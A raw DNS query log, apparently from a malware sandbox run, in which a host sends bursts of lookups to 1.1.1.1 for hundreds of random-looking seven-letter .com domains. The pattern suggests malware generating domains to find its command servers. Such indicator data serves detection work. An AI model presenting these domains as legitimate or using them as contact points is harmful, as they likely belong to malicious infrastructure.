Aug 23, 2024 18:48:23.552534103 CEST	192.168.2.4	1.1.1.1	0x724f	Standard query (0)	lyxymin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.552707911 CEST	192.168.2.4	1.1.1.1	0x776	Standard query (0)	gaqyzuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.553390980 CEST	192.168.2.4	1.1.1.1	0x445	Standard query (0)	vofydac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.553432941 CEST	192.168.2.4	1.1.1.1	0x252c	Standard query (0)	puzymig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.553545952 CEST	192.168.2.4	1.1.1.1	0xc63b	Standard query (0)	qeqylyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.553580999 CEST	192.168.2.4	1.1.1.1	0x51a4	Standard query (0)	puryxuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.553741932 CEST	192.168.2.4	1.1.1.1	0xa65a	Standard query (0)	gadydas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.553778887 CEST	192.168.2.4	1.1.1.1	0x259f	Standard query (0)	lymylyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.553950071 CEST	192.168.2.4	1.1.1.1	0xd241	Standard query (0)	volymum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.646929979 CEST	192.168.2.4	1.1.1.1	0x7e68	Standard query (0)	qedysov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.647690058 CEST	192.168.2.4	1.1.1.1	0x7102	Standard query (0)	galynuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.647738934 CEST	192.168.2.4	1.1.1.1	0x2c40	Standard query (0)	lysysod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.648318052 CEST	192.168.2.4	1.1.1.1	0x6f38	Standard query (0)	qekynuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.648344994 CEST	192.168.2.4	1.1.1.1	0x4ea2	Standard query (0)	pupypiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.648857117 CEST	192.168.2.4	1.1.1.1	0xe0e4	Standard query (0)	ganykaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.649350882 CEST	192.168.2.4	1.1.1.1	0xe704	Standard query (0)	lykynyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.649350882 CEST	192.168.2.4	1.1.1.1	0xa11d	Standard query (0)	vopypif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.649388075 CEST	192.168.2.4	1.1.1.1	0x15ae	Standard query (0)	qebykap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.649848938 CEST	192.168.2.4	1.1.1.1	0x6b9	Standard query (0)	pujybyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.650068998 CEST	192.168.2.4	1.1.1.1	0xd28c	Standard query (0)	gatypub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.650135040 CEST	192.168.2.4	1.1.1.1	0x884c	Standard query (0)	lyvyjox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.650614023 CEST	192.168.2.4	1.1.1.1	0xe6ca	Standard query (0)	vojybek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.650877953 CEST	192.168.2.4	1.1.1.1	0x6fc1	Standard query (0)	qetytug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.650877953 CEST	192.168.2.4	1.1.1.1	0xeb83	Standard query (0)	puvyjop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.651424885 CEST	192.168.2.4	1.1.1.1	0x4db0	Standard query (0)	gahyvew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.651453018 CEST	192.168.2.4	1.1.1.1	0x677f	Standard query (0)	lyrytun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.651912928 CEST	192.168.2.4	1.1.1.1	0x779d	Standard query (0)	vocyjic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.651912928 CEST	192.168.2.4	1.1.1.1	0xbd3b	Standard query (0)	qegyval.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.652369976 CEST	192.168.2.4	1.1.1.1	0xcc95	Standard query (0)	purytyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.652385950 CEST	192.168.2.4	1.1.1.1	0xc110	Standard query (0)	gacyhis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.652862072 CEST	192.168.2.4	1.1.1.1	0xd7eb	Standard query (0)	lygyvar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.653084040 CEST	192.168.2.4	1.1.1.1	0xf82e	Standard query (0)	vowyrym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.653115034 CEST	192.168.2.4	1.1.1.1	0xbe85	Standard query (0)	qexyhuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.653743029 CEST	192.168.2.4	1.1.1.1	0x3872	Standard query (0)	lyxygud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.653798103 CEST	192.168.2.4	1.1.1.1	0x6e3d	Standard query (0)	gaqyreh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.654268980 CEST	192.168.2.4	1.1.1.1	0x70c0	Standard query (0)	pufycol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.654524088 CEST	192.168.2.4	1.1.1.1	0xe023	Standard query (0)	vofycot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.654540062 CEST	192.168.2.4	1.1.1.1	0x75a1	Standard query (0)	qeqyreq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.655134916 CEST	192.168.2.4	1.1.1.1	0xca87	Standard query (0)	gadyciz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.655210018 CEST	192.168.2.4	1.1.1.1	0x1a88	Standard query (0)	puzyguv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.655596972 CEST	192.168.2.4	1.1.1.1	0xdd74	Standard query (0)	lymywaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.655936003 CEST	192.168.2.4	1.1.1.1	0x9372	Standard query (0)	qedyxip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.657912970 CEST	192.168.2.4	1.1.1.1	0xdb92	Standard query (0)	pumywaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.658724070 CEST	192.168.2.4	1.1.1.1	0x7c9e	Standard query (0)	pumylel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.658806086 CEST	192.168.2.4	1.1.1.1	0x4dc	Standard query (0)	vonyket.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.658924103 CEST	192.168.2.4	1.1.1.1	0xecad	Standard query (0)	volygyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.659145117 CEST	192.168.2.4	1.1.1.1	0x7031	Standard query (0)	galyfyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.659216881 CEST	192.168.2.4	1.1.1.1	0xbfd8	Standard query (0)	lysyxux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.659421921 CEST	192.168.2.4	1.1.1.1	0x4123	Standard query (0)	vonyqok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.659533978 CEST	192.168.2.4	1.1.1.1	0x363	Standard query (0)	qekyfeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.659636974 CEST	192.168.2.4	1.1.1.1	0x9b60	Standard query (0)	pupyxup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.659724951 CEST	192.168.2.4	1.1.1.1	0x8251	Standard query (0)	ganyqow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.659838915 CEST	192.168.2.4	1.1.1.1	0x22d5	Standard query (0)	vopyzuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.659904957 CEST	192.168.2.4	1.1.1.1	0xba5b	Standard query (0)	qebyqil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.660031080 CEST	192.168.2.4	1.1.1.1	0x272c	Standard query (0)	pujydag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.660099983 CEST	192.168.2.4	1.1.1.1	0x6cb0	Standard query (0)	gatyzys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.660209894 CEST	192.168.2.4	1.1.1.1	0xec50	Standard query (0)	lykyfen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.660306931 CEST	192.168.2.4	1.1.1.1	0x6b7c	Standard query (0)	lyvymir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.660381079 CEST	192.168.2.4	1.1.1.1	0xb83	Standard query (0)	lyryled.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.660496950 CEST	192.168.2.4	1.1.1.1	0x22af	Standard query (0)	qetylyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.660548925 CEST	192.168.2.4	1.1.1.1	0xd79	Standard query (0)	gahydoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.660722971 CEST	192.168.2.4	1.1.1.1	0xcacc	Standard query (0)	vocymut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.660747051 CEST	192.168.2.4	1.1.1.1	0x969a	Standard query (0)	qegysoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.660923004 CEST	192.168.2.4	1.1.1.1	0x7dce	Standard query (0)	purylev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.660960913 CEST	192.168.2.4	1.1.1.1	0xe48d	Standard query (0)	lygysij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.661130905 CEST	192.168.2.4	1.1.1.1	0x21c9	Standard query (0)	vowykaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.661317110 CEST	192.168.2.4	1.1.1.1	0x7b8b	Standard query (0)	gacynuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.661343098 CEST	192.168.2.4	1.1.1.1	0x420b	Standard query (0)	qexynyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.661494017 CEST	192.168.2.4	1.1.1.1	0xd42b	Standard query (0)	pufypiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.661560059 CEST	192.168.2.4	1.1.1.1	0xcd7a	Standard query (0)	gaqykab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.661711931 CEST	192.168.2.4	1.1.1.1	0x6c40	Standard query (0)	lyxynyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.661750078 CEST	192.168.2.4	1.1.1.1	0x369a	Standard query (0)	vojydam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.661906958 CEST	192.168.2.4	1.1.1.1	0x5a5e	Standard query (0)	puvymul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.694346905 CEST	192.168.2.4	1.1.1.1	0x86d9	Standard query (0)	qexyhuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.297363043 CEST	192.168.2.4	1.1.1.1	0x7957	Standard query (0)	vofypuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.298645020 CEST	192.168.2.4	1.1.1.1	0x890a	Standard query (0)	qeqykog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.299717903 CEST	192.168.2.4	1.1.1.1	0x16dd	Standard query (0)	gadypuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.299808025 CEST	192.168.2.4	1.1.1.1	0x894	Standard query (0)	puzybep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.299964905 CEST	192.168.2.4	1.1.1.1	0xb84c	Standard query (0)	galyvas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.300383091 CEST	192.168.2.4	1.1.1.1	0x3b6c	Standard query (0)	lymyjon.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.300853014 CEST	192.168.2.4	1.1.1.1	0x8d00	Standard query (0)	pumyjig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.300966978 CEST	192.168.2.4	1.1.1.1	0x910e	Standard query (0)	lysytyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.301599979 CEST	192.168.2.4	1.1.1.1	0x7aea	Standard query (0)	vonyjim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.301780939 CEST	192.168.2.4	1.1.1.1	0x8e3b	Standard query (0)	qekyvav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.304699898 CEST	192.168.2.4	1.1.1.1	0x4818	Standard query (0)	pupytyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.306760073 CEST	192.168.2.4	1.1.1.1	0x6ac9	Standard query (0)	volybec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.306931019 CEST	192.168.2.4	1.1.1.1	0x81cd	Standard query (0)	ganyhuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.307117939 CEST	192.168.2.4	1.1.1.1	0x11de	Standard query (0)	lykyvod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.307142973 CEST	192.168.2.4	1.1.1.1	0x66bd	Standard query (0)	qedytul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.307293892 CEST	192.168.2.4	1.1.1.1	0x199e	Standard query (0)	vopyret.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.307467937 CEST	192.168.2.4	1.1.1.1	0xcb9b	Standard query (0)	pujycov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.307648897 CEST	192.168.2.4	1.1.1.1	0xc5ef	Standard query (0)	lyvyguj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.307739019 CEST	192.168.2.4	1.1.1.1	0x40e	Standard query (0)	qebyhuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.307847023 CEST	192.168.2.4	1.1.1.1	0x2ca7	Standard query (0)	vojycif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.307931900 CEST	192.168.2.4	1.1.1.1	0xdd3d	Standard query (0)	puvygyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.308098078 CEST	192.168.2.4	1.1.1.1	0x86fd	Standard query (0)	gahycib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.308120012 CEST	192.168.2.4	1.1.1.1	0x5dc4	Standard query (0)	qetyrap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.308288097 CEST	192.168.2.4	1.1.1.1	0x251b	Standard query (0)	vocygyk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.308367968 CEST	192.168.2.4	1.1.1.1	0xc94c	Standard query (0)	gacyfew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.308444977 CEST	192.168.2.4	1.1.1.1	0xfddc	Standard query (0)	gatyrez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.308581114 CEST	192.168.2.4	1.1.1.1	0x9f0c	Standard query (0)	purywop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.308701992 CEST	192.168.2.4	1.1.1.1	0xcd4f	Standard query (0)	lygyxun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.308794022 CEST	192.168.2.4	1.1.1.1	0x1db9	Standard query (0)	vowyqoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.308948994 CEST	192.168.2.4	1.1.1.1	0x3033	Standard query (0)	qexyfel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.309032917 CEST	192.168.2.4	1.1.1.1	0x36e4	Standard query (0)	vofyzym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.309268951 CEST	192.168.2.4	1.1.1.1	0x92a0	Standard query (0)	lyxyfar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.309480906 CEST	192.168.2.4	1.1.1.1	0xd4da	Standard query (0)	puzydal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.309551954 CEST	192.168.2.4	1.1.1.1	0x4c9f	Standard query (0)	lyrywax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.309695005 CEST	192.168.2.4	1.1.1.1	0x7f93	Standard query (0)	gadyzyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.309778929 CEST	192.168.2.4	1.1.1.1	0x5f29	Standard query (0)	qeqyqiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.309917927 CEST	192.168.2.4	1.1.1.1	0x91b6	Standard query (0)	volydot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.310017109 CEST	192.168.2.4	1.1.1.1	0x2c65	Standard query (0)	qegyxug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.310142994 CEST	192.168.2.4	1.1.1.1	0xf7e1	Standard query (0)	qedyleq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.310197115 CEST	192.168.2.4	1.1.1.1	0xefb4	Standard query (0)	galydoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.310329914 CEST	192.168.2.4	1.1.1.1	0x5c20	Standard query (0)	lymymud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.310367107 CEST	192.168.2.4	1.1.1.1	0x6b9a	Standard query (0)	vonymuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.310537100 CEST	192.168.2.4	1.1.1.1	0xe37d	Standard query (0)	qekysip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.310585976 CEST	192.168.2.4	1.1.1.1	0xfed6	Standard query (0)	lysylej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.310729027 CEST	192.168.2.4	1.1.1.1	0x4514	Standard query (0)	pumymuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.310764074 CEST	192.168.2.4	1.1.1.1	0x573c	Standard query (0)	pupylaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.310920954 CEST	192.168.2.4	1.1.1.1	0x422	Standard query (0)	ganynyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.310955048 CEST	192.168.2.4	1.1.1.1	0x8d59	Standard query (0)	vopykak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.311124086 CEST	192.168.2.4	1.1.1.1	0xa490	Standard query (0)	lykysix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.311146021 CEST	192.168.2.4	1.1.1.1	0x2178	Standard query (0)	pujypup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.311325073 CEST	192.168.2.4	1.1.1.1	0xd7a1	Standard query (0)	qebynyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.311351061 CEST	192.168.2.4	1.1.1.1	0x5ec5	Standard query (0)	lyvynen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.311537027 CEST	192.168.2.4	1.1.1.1	0x8e6f	Standard query (0)	gatykow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.311553001 CEST	192.168.2.4	1.1.1.1	0xec89	Standard query (0)	qetykol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.311737061 CEST	192.168.2.4	1.1.1.1	0xd3ce	Standard query (0)	lyryjir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.311747074 CEST	192.168.2.4	1.1.1.1	0xee03	Standard query (0)	puvybeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.311927080 CEST	192.168.2.4	1.1.1.1	0xf868	Standard query (0)	vojypuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.311947107 CEST	192.168.2.4	1.1.1.1	0xf991	Standard query (0)	vocybam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.312124014 CEST	192.168.2.4	1.1.1.1	0x8bc3	Standard query (0)	qegytyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.312166929 CEST	192.168.2.4	1.1.1.1	0x27a7	Standard query (0)	gacyvah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.312354088 CEST	192.168.2.4	1.1.1.1	0x4883	Standard query (0)	puryjil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.312580109 CEST	192.168.2.4	1.1.1.1	0xb4b2	Standard query (0)	pufyxug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.312580109 CEST	192.168.2.4	1.1.1.1	0x8fb6	Standard query (0)	gahypus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.312686920 CEST	192.168.2.4	1.1.1.1	0x170	Standard query (0)	gaqyqis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.498559952 CEST	192.168.2.4	1.1.1.1	0x3e3a	Standard query (0)	lygytyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.499373913 CEST	192.168.2.4	1.1.1.1	0xbf4c	Standard query (0)	vowyjut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.499552965 CEST	192.168.2.4	1.1.1.1	0x163c	Standard query (0)	qexyvoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.499881983 CEST	192.168.2.4	1.1.1.1	0x23fe	Standard query (0)	pufytev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.500304937 CEST	192.168.2.4	1.1.1.1	0x6b23	Standard query (0)	gaqyhuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.500679016 CEST	192.168.2.4	1.1.1.1	0x2fda	Standard query (0)	lyxyvoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.500758886 CEST	192.168.2.4	1.1.1.1	0x6ef9	Standard query (0)	vofyref.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.501255989 CEST	192.168.2.4	1.1.1.1	0xb291	Standard query (0)	puzyciq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.501286030 CEST	192.168.2.4	1.1.1.1	0xf233	Standard query (0)	qeqyhup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.501773119 CEST	192.168.2.4	1.1.1.1	0x4786	Standard query (0)	gadyrab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.502105951 CEST	192.168.2.4	1.1.1.1	0xbda7	Standard query (0)	lymygyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.502549887 CEST	192.168.2.4	1.1.1.1	0xadb9	Standard query (0)	qedyrag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.502669096 CEST	192.168.2.4	1.1.1.1	0xe2ac	Standard query (0)	volycik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.503185034 CEST	192.168.2.4	1.1.1.1	0x64a5	Standard query (0)	pumygyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.503583908 CEST	192.168.2.4	1.1.1.1	0xac12	Standard query (0)	galycuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.503710032 CEST	192.168.2.4	1.1.1.1	0xe526	Standard query (0)	lysywon.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.504254103 CEST	192.168.2.4	1.1.1.1	0x9403	Standard query (0)	vonygec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.504370928 CEST	192.168.2.4	1.1.1.1	0xef20	Standard query (0)	pupywog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.504838943 CEST	192.168.2.4	1.1.1.1	0x6f55	Standard query (0)	lykyxur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.505122900 CEST	192.168.2.4	1.1.1.1	0xa96c	Standard query (0)	ganyfes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.505168915 CEST	192.168.2.4	1.1.1.1	0x60d8	Standard query (0)	vopyqim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.505798101 CEST	192.168.2.4	1.1.1.1	0x7969	Standard query (0)	qebyfav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.505896091 CEST	192.168.2.4	1.1.1.1	0x58c5	Standard query (0)	pujyxyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.506537914 CEST	192.168.2.4	1.1.1.1	0x8c65	Standard query (0)	gatyqih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.507006884 CEST	192.168.2.4	1.1.1.1	0x194	Standard query (0)	lyvyfad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.507255077 CEST	192.168.2.4	1.1.1.1	0xbdc3	Standard query (0)	qetyquq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.507950068 CEST	192.168.2.4	1.1.1.1	0x5f01	Standard query (0)	puvydov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.508038998 CEST	192.168.2.4	1.1.1.1	0xbbbe	Standard query (0)	gahyzez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.508466959 CEST	192.168.2.4	1.1.1.1	0xa296	Standard query (0)	lyrymuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.508671045 CEST	192.168.2.4	1.1.1.1	0x256e	Standard query (0)	vocydof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.509181976 CEST	192.168.2.4	1.1.1.1	0x1bae	Standard query (0)	purymuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.509229898 CEST	192.168.2.4	1.1.1.1	0x5b50	Standard query (0)	qegylep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.509743929 CEST	192.168.2.4	1.1.1.1	0x5a07	Standard query (0)	gacydib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.510235071 CEST	192.168.2.4	1.1.1.1	0xdbc9	Standard query (0)	lygylax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.510345936 CEST	192.168.2.4	1.1.1.1	0x2a59	Standard query (0)	vowymyk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.510802984 CEST	192.168.2.4	1.1.1.1	0x68f	Standard query (0)	qexysig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.511387110 CEST	192.168.2.4	1.1.1.1	0x907a	Standard query (0)	gaqynyw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.511432886 CEST	192.168.2.4	1.1.1.1	0x329a	Standard query (0)	pufylap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.512129068 CEST	192.168.2.4	1.1.1.1	0xcc68	Standard query (0)	vofykoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.512542963 CEST	192.168.2.4	1.1.1.1	0x6edb	Standard query (0)	lyxysun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.512662888 CEST	192.168.2.4	1.1.1.1	0xff24	Standard query (0)	qeqynel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.513588905 CEST	192.168.2.4	1.1.1.1	0xcb99	Standard query (0)	gadykos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.514260054 CEST	192.168.2.4	1.1.1.1	0xb478	Standard query (0)	lymyner.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.514585018 CEST	192.168.2.4	1.1.1.1	0x5553	Standard query (0)	volypum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.515206099 CEST	192.168.2.4	1.1.1.1	0xad8c	Standard query (0)	pumybal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.515240908 CEST	192.168.2.4	1.1.1.1	0xf6a8	Standard query (0)	qedykiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.516015053 CEST	192.168.2.4	1.1.1.1	0x2a9	Standard query (0)	galypyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.516330957 CEST	192.168.2.4	1.1.1.1	0x225c	Standard query (0)	vonybat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.516606092 CEST	192.168.2.4	1.1.1.1	0x1c74	Standard query (0)	lysyjid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.517291069 CEST	192.168.2.4	1.1.1.1	0xbc93	Standard query (0)	qekytyq.com	A (IP address)	IN (0x0001)	false
